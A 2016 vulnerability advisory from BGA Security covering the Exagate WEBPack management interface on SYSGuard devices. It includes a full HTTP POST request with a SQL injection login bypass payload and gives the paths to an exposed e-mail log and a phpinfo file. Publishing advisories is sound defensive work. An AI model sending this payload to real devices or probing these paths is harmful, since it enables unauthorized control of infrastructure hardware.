Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities
Author:
========
Halil Dalabasmaz
Release Date:
==============
07 OCT 2016
Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
Vendor Homepage:
=================
http://www.exagate.com/
Vulnerability Information:
===========================
Exagate uses the WEBPack Management System software on its hardware.
The software is web-based and provides control of the hardware. There are
multiple vulnerabilities in that software.
Vulnerability #1: SQL Injection
================================
There is no filtering or validation mechanism in "login.php". The "username"
and "password" inputs are vulnerable to SQL Injection attacks. A sample POST
request is given below.
POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=root&password=' or 1=1--
Vulnerability #2: Unauthorized Access To Sensitive Information
===============================================================
The software is capable of sending e-mail to system admins, but there is no
authorization mechanism protecting the e-mail logs. The e-mail logs are accessible
anonymously at "http://<TARGET HOST>/emaillog.txt".
Vulnerability #3: Unremoved Configuration Files
================================================
The software exposes the PHP Info file at the following URL.
http://<TARGET HOST>/api/phpinfo.php
Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - No response from vendor and re-attempted to contact vendor
07 OCT 2016 - No response from vendor
07 OCT 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
Exagate SYSGuard 3001 (most probably all Exagate hardware is affected by these vulnerabilities)
Tested On:
===========
Exagate SYSGuard 3001
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: [email protected]
Copyright © 2016 | BGA Security LLC